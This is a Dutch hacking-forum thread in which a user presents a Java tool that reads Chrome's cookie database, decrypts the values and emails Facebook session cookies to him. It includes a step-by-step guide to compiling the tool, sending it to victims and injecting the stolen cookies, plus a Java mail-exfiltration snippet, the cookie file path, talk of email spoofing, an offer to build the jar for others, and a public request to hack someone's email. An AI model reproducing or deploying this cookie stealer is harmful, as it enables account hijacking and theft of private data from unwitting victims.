Heeey iedereen!
Het is me uiteindelijk gelukt facebook accounts te hacken door middel van cookie hijacking
Ik heb een simpele java applicatie gemaakt die de Cookie database file van Google Chrome ophaalt, vervolgens deze uitleest doormiddel van een Sqlite database reader, dan de ge-encrypte cookie-values decrypt met behulp van een JNA functie, en uiteindelijk de ge-decrypte facebook cookies naar mij doormailt c:
Met zijn toestemming heb ik nu een vriend van mij 'gehacked'!
Resultaat:
Natuurlijk is het eerste dat je doet kijken wat die persoon over je zegt tegen anderen:
Source:
[gesloten] Facebook hacking c:
Kantoor
ongeveer 8 jaar geleden
penYa
ongeveer 8 jaar geleden
Seems hard, knap van je !
Rank CS;GO: Supreme Master First Class
[/URL]
[/URL]
jandeijscoman
ongeveer 8 jaar geleden
Share iT plssss
>>>KLIK OP DIE LINKS<<<
OLAMACARE KOOP HET NU: ALS U ZIEK BENT KOMT EEN LAMA JE NEUKEN!
OLAMACARE KOOP HET NU: ALS U ZIEK BENT KOMT EEN LAMA JE NEUKEN!
DingDong
ongeveer 8 jaar geleden
Zoo nice nu share
Een spammer = Een N.A.Z
N.A.Z = Negatieve Aandacht Zoeker
N.A.Z = Negatieve Aandacht Zoeker
Draity
ongeveer 8 jaar geleden
Op welke manier hebben we het dan over hacken? Leg eens uit hoe je op zijn account komt bijv
Kantoor
ongeveer 8 jaar geleden
Door zijn cookies te injecten in mijn browser
Ik zal de source op github zetten
Quote: Draity
Op welke manier hebben we het dan over hacken? Leg eens uit hoe je op zijn account komt bijv
Door zijn cookies te injecten in mijn browser
Ik zal de source op github zetten
Draity
ongeveer 8 jaar geleden
chill
Quote: Kantoor
[...]
Door zijn cookies te injecten in mijn browser
Ik zal de source op github zetten
chill
526f676572
ongeveer 8 jaar geleden
-
Laatst bewerkt: 19-05-18 13:04 door: 526f676572Renchon
ongeveer 8 jaar geleden
Kantoor
ongeveer 8 jaar geleden
Nah, gewoon: %LocalAppData%\Google\Chrome\User Data\Default\Cookies
Als je dit bestand naar Barack Obama stuurt en hij opent het, dan wel ja.
Link naar GitHub gepost!Laatst bewerkt: 03-11-15 23:24 door: Kantoor
Quote: 526f676572
[...]
Hoe ben je aan de naam van de random chrome folder geraakt? De rest stelselmatig deleten?
Nah, gewoon: %LocalAppData%\Google\Chrome\User Data\Default\Cookies
Quote: Renchon
Dus als ik het goed begrijp kan je nu namens Barack Obama berichten sturen?
Als je dit bestand naar Barack Obama stuurt en hij opent het, dan wel ja.
Link naar GitHub gepost!Laatst bewerkt: 03-11-15 23:24 door: Kantoor
Zegwollah
ongeveer 8 jaar geleden
Nice man, niet vergeten om linkje naar github te plaatsen op derp;)
Kantoor
ongeveer 8 jaar geleden
Staat al in mijn post hoor o:
Quote: Zegwollah
Nice man, niet vergeten om linkje naar github te plaatsen op derp;)
Staat al in mijn post hoor o:
526f676572
ongeveer 8 jaar geleden
-
Laatst bewerkt: 19-05-18 13:04 door: 526f676572Kantoor
ongeveer 8 jaar geleden
Aangezien het maar een test accountje was heb ik de moeite niet genomen die credentials er uit te halen
Toch bedankt voor het even te vermelden!
Quote: XXXTentacion
Heb je expres de mail niet verborgen, of per ongeluk vergeten? Kwam de gegevens hiervan tegen.
[img]
Aangezien het maar een test accountje was heb ik de moeite niet genomen die credentials er uit te halen
Toch bedankt voor het even te vermelden!
Kantoor
ongeveer 8 jaar geleden
Tuurlijk weet ik dat, aangezien ik het zelf gemaakt heb en er maar 5 classes zijn
Quote: XXXTentacion
[...]
Weet je ook al waar het staat in welk bestand of wilcje dat ook weten?
Tuurlijk weet ik dat, aangezien ik het zelf gemaakt heb en er maar 5 classes zijn
Kantoor
ongeveer 8 jaar geleden
Dat kan je zien in de Run.java file (ik was te lui om dit proper in een aparte klasse te doen).
Ik gebruik de sqlite jdbc (Java Database Connectivity) driver.Laatst bewerkt: 04-11-15 01:53 door: Kantoor
Quote: XXXTentacion
[...]
Ja oke haha, hoe lees jij trouwens die cookie DB uit?
Dat kan je zien in de Run.java file (ik was te lui om dit proper in een aparte klasse te doen).
Ik gebruik de sqlite jdbc (Java Database Connectivity) driver.Laatst bewerkt: 04-11-15 01:53 door: Kantoor
Antibull
ongeveer 8 jaar geleden
Jammer dat ik niet weet hoe het werk kan je tut maken ? Of is het veel werk ?
Kantoor
ongeveer 8 jaar geleden
Goh, wat je zou moeten doen is:
1. Project downloaden als zip
2. Je e-mail en wachtwoord invullen in de MailSender.java class.
3. Compilen naar een jar
4. Sturen naar iemand die Chrome heeft
5. Je ontvangt de Facebook-cookies in je mail van iemand die het programma heeft gerunt
6. De Facebook cookies in je browser injecteren met behulp van een tool die dat voor je doet (aangezien het manueel doen meer werk is).
Ik gebruik de 'EditThisCookie' Chrome plugin.Laatst bewerkt: 04-11-15 14:23 door: Kantoor
Quote: Antibull
Jammer dat ik niet weet hoe het werk kan je tut maken ? Of is het veel werk ?
Goh, wat je zou moeten doen is:
1. Project downloaden als zip
2. Je e-mail en wachtwoord invullen in de MailSender.java class.
3. Compilen naar een jar
4. Sturen naar iemand die Chrome heeft
5. Je ontvangt de Facebook-cookies in je mail van iemand die het programma heeft gerunt
6. De Facebook cookies in je browser injecteren met behulp van een tool die dat voor je doet (aangezien het manueel doen meer werk is).
Ik gebruik de 'EditThisCookie' Chrome plugin.Laatst bewerkt: 04-11-15 14:23 door: Kantoor
Antibull
ongeveer 8 jaar geleden
ooh dat is ez ty
Quote: Kantoor
[...]
Goh, wat je zou moeten doen is:
1. Project downloaden als zip
2. Je e-mail en wachtwoord invullen in de Run.java class.
3. Compilen naar een jar
4. Sturen naar iemand die Chrome heeft
5. Je ontvangt de Facebook-cookies in je mail van iemand die het programma heeft gerunt
6. De Facebook cookies in je browser injecteren met behulp van een tool die dat voor je doet (aangezien het manueel doen meer werk is).
Ik gebruik de 'EditThisCookie' Chrome plugin.
ooh dat is ez ty
Kantoor
ongeveer 8 jaar geleden
Moest het niet lukken mag je me altijd je e-mail pb'en, dan maak ik de jar wel even voor je.
Quote: Antibull
[...]
ooh dat is ez ty
Moest het niet lukken mag je me altijd je e-mail pb'en, dan maak ik de jar wel even voor je.
Aspact
ongeveer 8 jaar geleden
Je bedoelt in de MailSender.java. In de Run.java kun je je mail niet eens instellen.
Quote: Kantoor
[...]
Goh, wat je zou moeten doen is:
1. Project downloaden als zip
2. Je e-mail en wachtwoord invullen in de Run.java class.
3. Compilen naar een jar
4. Sturen naar iemand die Chrome heeft
5. Je ontvangt de Facebook-cookies in je mail van iemand die het programma heeft gerunt
6. De Facebook cookies in je browser injecteren met behulp van een tool die dat voor je doet (aangezien het manueel doen meer werk is).
Ik gebruik de 'EditThisCookie' Chrome plugin.
Je bedoelt in de MailSender.java. In de Run.java kun je je mail niet eens instellen.
Random CFW Tutorials [PS3]
[!] PS3 GTA 5 Recovery Service [!]
- Max Skills
- Money
- Rank
- Roosevelt Car
- All Unlocks
- More!
Contact: aspact.gta@gmail.com
[!] PS3 GTA 5 Recovery Service [!]
- Max Skills
- Money
- Rank
- Roosevelt Car
- All Unlocks
- More!
Contact: aspact.gta@gmail.com
Just1c3!
ongeveer 8 jaar geleden
Oh damn ik dacht even dat je een lek had gevonden
NEE
Turtle
ongeveer 8 jaar geleden
Haha ja ik ook, maar dit is ook wel nice.
Quote: Just1c3!
Oh damn ik dacht even dat je een lek had gevonden
Haha ja ik ook, maar dit is ook wel nice.
Kantoor
ongeveer 8 jaar geleden
Oeps ja idd, al aangepast.
Quote: Aspact
[...]
Je bedoelt in de MailSender.java. In de Run.java kun je je mail niet eens instellen.
Oeps ja idd, al aangepast.
Aspact
ongeveer 8 jaar geleden
Ik heb me eerlijk gezegd niet verdiept in java, dus dit kan misschien een beetje dom overkomen... Welke files moeten in de jar file komen ?
Quote: Kantoor
[...]
Oeps ja idd, al aangepast.
Ik heb me eerlijk gezegd niet verdiept in java, dus dit kan misschien een beetje dom overkomen... Welke files moeten in de jar file komen ?
Random CFW Tutorials [PS3]
[!] PS3 GTA 5 Recovery Service [!]
- Max Skills
- Money
- Rank
- Roosevelt Car
- All Unlocks
- More!
Contact: aspact.gta@gmail.com
[!] PS3 GTA 5 Recovery Service [!]
- Max Skills
- Money
- Rank
- Roosevelt Car
- All Unlocks
- More!
Contact: aspact.gta@gmail.com
Kantoor
ongeveer 8 jaar geleden
Allemaal? o:
Quote: Aspact
[...]
Ik heb me eerlijk gezegd niet verdiept in java, dus dit kan misschien een beetje dom overkomen... Welke files moeten in de jar file komen ?
Allemaal? o:
Cookiemonstah
ongeveer 8 jaar geleden
Misschien kan je dit naar FB doorsturen, dat ze het beter moeten encrypten? Kan je wellicht een reward krijgen. Ik zou het anyways niet weggegeven hebben, maarja, dat ben ik. (Mensen gaan er slechte dingen mee doen)
Quote: Kantoor
[...]
Allemaal? o:
Misschien kan je dit naar FB doorsturen, dat ze het beter moeten encrypten? Kan je wellicht een reward krijgen. Ik zou het anyways niet weggegeven hebben, maarja, dat ben ik. (Mensen gaan er slechte dingen mee doen)
Mijn minecraft plugins
[Friends] - Je eigen social network op Minecraft: 6$
[Coins] - Creeër je eigen donator coins systeem: 5$
[Welcome Message] - Welkom bericht wanneer men inlogt: gratis
[StatRewards] - Rewards voor behalen van stats: 5$ (SOON)
[Friends] - Je eigen social network op Minecraft: 6$
[Coins] - Creeër je eigen donator coins systeem: 5$
[Welcome Message] - Welkom bericht wanneer men inlogt: gratis
[StatRewards] - Rewards voor behalen van stats: 5$ (SOON)
Kantoor
ongeveer 8 jaar geleden
Dit ligt niet aan Facebook maar aan Chrome.
Met mijn code kan je door minimale aanpassingen een Derpforum session hijacker maken, een Youtube session hijacker etc..
Quote: Cookiemonstah
[...]
Misschien kan je dit naar FB doorsturen, dat ze het beter moeten encrypten? Kan je wellicht een reward krijgen. Ik zou het anyways niet weggegeven hebben, maarja, dat ben ik. (Mensen gaan er slechte dingen mee doen)
Dit ligt niet aan Facebook maar aan Chrome.
Met mijn code kan je door minimale aanpassingen een Derpforum session hijacker maken, een Youtube session hijacker etc..
Gekkerdje
ongeveer 8 jaar geleden
ben ik het niet volledig mee eens mijn websites werken ook met z'n cookie alleen ik koppel die ook nog aan het ip dus dan is dit al niet meer mogelijk
Quote: Kantoor
[...]
Dit ligt niet aan Facebook maar aan Chrome.
Met mijn code kan je door minimale aanpassingen een Derpforum session hijacker maken, een Youtube session hijacker etc..
ben ik het niet volledig mee eens mijn websites werken ook met z'n cookie alleen ik koppel die ook nog aan het ip dus dan is dit al niet meer mogelijk
t
Kantoor
ongeveer 8 jaar geleden
Woah, slim eigenlijk, nog niet aan gedacht!
Het enige rotte is dan dat je niet kan inloggen op meerdere devices
Quote: Gekkerdje
[...]
ben ik het niet volledig mee eens mijn websites werken ook met z'n cookie alleen ik koppel die ook nog aan het ip dus dan is dit al niet meer mogelijk
Woah, slim eigenlijk, nog niet aan gedacht!
Het enige rotte is dan dat je niet kan inloggen op meerdere devices
Gekkerdje
ongeveer 8 jaar geleden
jawel
die hebben een andere cookie die ook op dat ip staat
Quote: Kantoor
[...]
Woah, slim eigenlijk, nog niet aan gedacht!
Het enige rotte is dan dat je niet kan inloggen op meerdere devices
jawel
die hebben een andere cookie die ook op dat ip staat
t
Kantoor
ongeveer 8 jaar geleden
Dus een gebruiker kan meerdere cookies hebben, en elke keer er een request binnenkomt ga je door alle cookies van die gebruiker kijken?
Quote: Gekkerdje
[...]
jawel
die hebben een andere cookie die ook op dat ip staat
Dus een gebruiker kan meerdere cookies hebben, en elke keer er een request binnenkomt ga je door alle cookies van die gebruiker kijken?
Gekkerdje
ongeveer 8 jaar geleden
yup heb een tabel login remember staat user id, ip, cookie in
kunnen er dus zoveel zijn als je wilt
Wat mijn sites dus doen stuur ip, cookie -> database
En dan kijkt hij of hij die dus in die tabel kan vinden en weet hij door die tabel welke user het is en die kan dus zoveel cookies hebben als die wilt.
Quote: Kantoor
[...]
Dus een gebruiker kan meerdere cookies hebben, en elke keer er een request binnenkomt ga je door alle cookies van die gebruiker kijken?
yup heb een tabel login remember staat user id, ip, cookie in
kunnen er dus zoveel zijn als je wilt
Wat mijn sites dus doen stuur ip, cookie -> database
En dan kijkt hij of hij die dus in die tabel kan vinden en weet hij door die tabel welke user het is en die kan dus zoveel cookies hebben als die wilt.
t
Cookiemonstah
ongeveer 8 jaar geleden
Waarin programmeer jij eigenlijk Java? IntelliJ?
Mijn minecraft plugins
[Friends] - Je eigen social network op Minecraft: 6$
[Coins] - Creeër je eigen donator coins systeem: 5$
[Welcome Message] - Welkom bericht wanneer men inlogt: gratis
[StatRewards] - Rewards voor behalen van stats: 5$ (SOON)
[Friends] - Je eigen social network op Minecraft: 6$
[Coins] - Creeër je eigen donator coins systeem: 5$
[Welcome Message] - Welkom bericht wanneer men inlogt: gratis
[StatRewards] - Rewards voor behalen van stats: 5$ (SOON)
526f676572
ongeveer 8 jaar geleden
-
Laatst bewerkt: 19-05-18 13:04 door: 526f676572Gekkerdje
ongeveer 8 jaar geleden
juist wel volgens mij snap je het niet goed maar oke.
Quote: 526f676572
[...]
Alleen heeft dat geen zin. Als dit programma al ge-execute wordt is het systeem al compromised, dus dan is alle security al bypassed en heeft het allemaal geen zin meer.
juist wel volgens mij snap je het niet goed maar oke.
t
526f676572
ongeveer 8 jaar geleden
-
Laatst bewerkt: 19-05-18 13:04 door: 526f676572Kantoor
ongeveer 8 jaar geleden
Jup, taal: Java, IDE: IntelliJ
Quote: Cookiemonstah
Waarin programmeer jij eigenlijk Java? IntelliJ?
Jup, taal: Java, IDE: IntelliJ
Murf
ongeveer 8 jaar geleden
Waarom zit er in mailsender nog 2 emailadressen?
public void send(String data) { try { Message message = new MimeMessage(session); message.setFrom(new InternetAddress("jcchrometest95@gmail.com")); message.setRecipients(Message.RecipientType.TO, InternetAddress.parse("jasper@catthoor.com")); message.setSubject("Facebook hijack"); message.setText(data); Transport.send(message); System.out.println("Done"); } catch (MessagingException e) { e.printStackTrace(); } } }
Kantoor
ongeveer 8 jaar geleden
In de initSession methode zet je de username en het password nodig voor een mail te sturen via gmail.
In de send methode heb je message.setFrom(). Hier heb je de keuze om een ander email-adres in te vullen. Dan wordt het bericht nog steeds verstuurd van het account uit initSession, maar ziet de bestemmeling enkel het email-adres dat je in de setFrom meegeeft. (e-mail spoofen dus)
Jammergenoeg werkt e-mail spoofen niet bij gmail, ze zetten zelf je setFrom() adres om naar je session adres
Quote: Murf
Waarom zit er in mailsender nog 2 emailadressen?
public void send(String data) { try { Message message = new MimeMessage(session); message.setFrom(new InternetAddress("jcchrometest95@gmail.com")); message.setRecipients(Message.RecipientType.TO, InternetAddress.parse("jasper@catthoor.com")); message.setSubject("Facebook hijack"); message.setText(data); Transport.send(message); System.out.println("Done"); } catch (MessagingException e) { e.printStackTrace(); } } }
In de initSession methode zet je de username en het password nodig voor een mail te sturen via gmail.
In de send methode heb je message.setFrom(). Hier heb je de keuze om een ander email-adres in te vullen. Dan wordt het bericht nog steeds verstuurd van het account uit initSession, maar ziet de bestemmeling enkel het email-adres dat je in de setFrom meegeeft. (e-mail spoofen dus)
Jammergenoeg werkt e-mail spoofen niet bij gmail, ze zetten zelf je setFrom() adres om naar je session adres
Murf
ongeveer 8 jaar geleden
Ik dacht al dat het dat was, alleen heb niet bepaald echt verstand van java, bedankt voor de uitleg!
Quote: Kantoor
[...]
In de initSession methode zet je de username en het password nodig voor een mail te sturen via gmail.
In de send methode heb je message.setFrom(). Hier heb je de keuze om een ander email-adres in te vullen. Dan wordt het bericht nog steeds verstuurd van het account uit initSession, maar ziet de bestemmeling enkel het email-adres dat je in de setFrom meegeeft. (e-mail spoofen dus)
Jammergenoeg werkt e-mail spoofen niet bij gmail, ze zetten zelf je setFrom() adres om naar je session adres
Ik dacht al dat het dat was, alleen heb niet bepaald echt verstand van java, bedankt voor de uitleg!
Kantoor
ongeveer 8 jaar geleden
Np!
Ik heb juist even gekeken of mijn webhost's mail-server beveiligd is tegen e-mail spoofen, maar dat is hij niet
Quote: Murf
[...]
Ik dacht al dat het dat was, alleen heb niet bepaald echt verstand van java, bedankt voor de uitleg!
Np!
Ik heb juist even gekeken of mijn webhost's mail-server beveiligd is tegen e-mail spoofen, maar dat is hij niet
Proudmama86
ongeveer 8 jaar geleden
Ik
Zoek hacker!!
die een email kan hacken
Met @live.nl
Ken iemand me daarbij helpen?
Kantoor
ongeveer 8 jaar geleden
Cutie <3
Quote: Proudmama86
Ik
Zoek hacker!!
die een email kan hacken
Met @live.nl
Ken iemand me daarbij helpen?
Cutie <3
Je moet inloggen om te kunnen reageren.